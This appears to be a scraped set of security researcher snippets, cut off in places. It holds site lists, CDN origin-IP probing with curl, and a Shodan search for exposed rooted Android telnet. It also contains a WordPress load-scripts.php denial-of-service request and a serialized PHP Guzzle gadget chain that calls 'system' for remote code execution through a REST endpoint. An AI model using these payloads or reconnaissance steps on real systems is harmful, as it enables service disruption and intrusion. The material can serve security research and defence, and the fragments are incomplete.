theMiddleBlue

http://www.123gouter.fr
http://www.50ansdecine.fr
http://www.abigaely-voyance.fr
http://www.accueil-funeraire.fr
http://www.ace-renov.fr
http://www.achterhoek.nu
http://www.active-health.nl
http://www.addam-31.fr
http://www.adevesoiree.fr
http://www.adhi.es

theMiddleBlue

http://www.adsilazio.it
http://www.al-parco.it
http://www.aneurysm.it
http://www.anonimoitaliano.it
http://www.ardaland.it
http://www.ascdiromagna.it
http://www.battagliamontecassino.it
http://www.biellaintraprendere.it
http://www.cabarun.it
http://www.calzaturificiorenata.it

theMiddleBlue

{
  "took": 103,
  "timed_out": false,
  "_shards": {
    "total": 304,
    "successful": 304,
    "failed": 0
  },
  "hits": {
    "total": 898,

theMiddleBlue

theMiddlePro:~ root# curl -k -v --resolve corriere.it:80:104.24.99.193 'http://corriere.it/'
* Added corriere.it:80:104.24.99.193 to DNS cache
* Hostname corriere.it was found in DNS cache
*   Trying 104.24.99.193...
* TCP_NODELAY set
* Connected to corriere.it (104.24.99.193) port 80 (#0)
> GET / HTTP/1.1
> Host: corriere.it
> User-Agent: curl/7.54.0

theMiddleBlue

theMiddlePro:~ root# curl -v --resolve corriere.it:80:104.27.143.145 'http://corriere.it/'
* Added corriere.it:80:104.27.143.145 to DNS cache
* Hostname corriere.it was found in DNS cache
*   Trying 104.27.143.145...
* TCP_NODELAY set
* Connected to corriere.it (104.27.143.145) port 80 (#0)
> GET / HTTP/1.1
> Host: corriere.it
> User-Agent: curl/7.54.0

theMiddleBlue

import httplib, urllib, re, sys, json, socket, struct

# python shodan.py 0
#                  ^ this is the page number

shodan = {
	'apikey': '<your shodan API key>',
	'query': r'"root%40"+"android"+port%3A23',
}

theMiddleBlue

import requests, sys

payload = '/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-

theMiddleBlue

<?php

	if(isset($_POST['photo'])) {
		// echo $_POST['photo'];

		file_put_contents('/usr/local/openresty/nginx/html/test.jpg', base64_decode($_POST['photo']));

		exec("curl -s -X POST -F 'file=@/usr/local/openresty/nginx/html/test.jpg' http://192.168.1.4:8080/facebox/check", $a);

		echo(implode('', $a));

theMiddleBlue

{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {
    "type": {
      "href": "http://localhost/rest/type/shortcut/default"

theMiddleBlue

server {
   listen       80;
   server_name  example.com;

   encrypted_session_key 'v1-clG~!~v7B_Z0yu.:iw*Rj#l-Nc8E^';
   encrypted_session_iv "themiddlerfvbgt5";
   encrypted_session_expires 20;

   location ~ /botbuster.js {
      default_type 'text/javascript';